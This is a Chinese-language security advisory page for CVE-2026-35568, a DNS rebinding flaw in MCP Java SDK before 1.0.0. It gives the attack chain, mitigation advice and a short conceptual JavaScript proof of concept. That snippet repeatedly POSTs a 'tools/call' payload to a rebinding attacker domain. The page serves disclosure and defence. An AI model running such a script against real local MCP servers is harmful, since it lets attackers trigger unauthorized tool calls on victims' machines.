CVE-2026-35568 CVSS 5.7 中危

CVE-2026-35568 MCP Java SDK DNS重绑定漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35568

漏洞类型

DNS重绑定

CVSS评分

5.7 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MCP Java SDK

漏洞概述

MCP Java SDK在1.0.0之前的版本中存在DNS重绑定漏洞。该漏洞允许攻击者通过受害者的浏览器（本地或网络相邻）访问本地或网络私有的java-sdk MCP服务器。攻击者可以伪装成本地运行的MCP连接AI代理，对服务器发起任意工具调用，从而可能操纵服务器行为。

技术细节

该漏洞源于DNS重绑定攻击机制。攻击者注册一个恶意域名，并将其DNS记录配置为在短时间内从攻击者控制的公网IP地址切换到受害者本地的私有IP地址（即MCP Java SDK监听的地址）。当受害者访问攻击者精心构造的恶意网页时，浏览器会发起对该域名的请求。由于浏览器DNS缓存或连接复用机制，随后的请求可能被指向本地私网地址。MCP Java SDK未对请求源头的合法性进行严格校验，导致攻击者能够绕过同源策略限制，通过受害者的浏览器向本地MCP服务器发送恶意指令，执行任意工具调用，从而破坏系统完整性。

攻击链分析

STEP 1

1. 环境准备

攻击者搭建恶意网站，并配置DNS服务器。将恶意域名（如attacker.com）的TTL设置得很短，初始解析为攻击者控制的服务器IP。

STEP 2

2. 诱导访问

攻击者诱导受害者访问恶意网站，受害者的浏览器加载页面中的JavaScript代码，并请求attacker.com的资源。

STEP 3

3. DNS重绑定

在JavaScript代码持续运行期间，攻击者修改DNS记录，将域名解析指向受害者本地的私有IP地址（如127.0.0.1或内网IP）。

STEP 4

4. 绕过限制

浏览器再次发起请求时，由于同源策略基于域名而非IP，请求被发送到本地的MCP Java SDK服务。

STEP 5

5. 执行攻击

MCP Java SDK接收请求并执行攻击者指定的工具调用，导致系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Conceptual PoC for DNS Rebinding against MCP Java SDK -->
<!-- Attacker controls the DNS server for malicious.com -->
<!-- DNS initially points to Attacker IP, then rebinds to 127.0.0.1 -->

<script>
  const targetUrl = 'http://malicious.com:port'; // Assuming the SDK runs on a known port
  const payload = {
    method: 'tools/call',
    params: {
      name: 'arbitrary_tool',
      arguments: { 'malicious_param': 'value' }
    }
  };

  function attemptExploit() {
    fetch(targetUrl, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    })
    .then(response => response.text())
    .then(data => console.log('Exploit Success:', data))
    .catch(error => {
      // DNS rebinding might take time, retry until successful or timeout
      console.log('Waiting for DNS rebinding...');
    });
  }

  // Poll to catch the moment DNS rebinds to the local IP
  setInterval(attemptExploit, 1000);
</script>

影响范围

MCP Java SDK < 1.0.0

防御指南

临时缓解措施

如果不能立即升级，建议将MCP服务器部署在隔离的网络环境中，或者配置操作系统级别的防火墙规则，阻止外部流量访问MCP服务端口，同时禁用浏览器对本地非标准端口的访问能力（如需浏览器访问，确保有严格的身份验证层）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表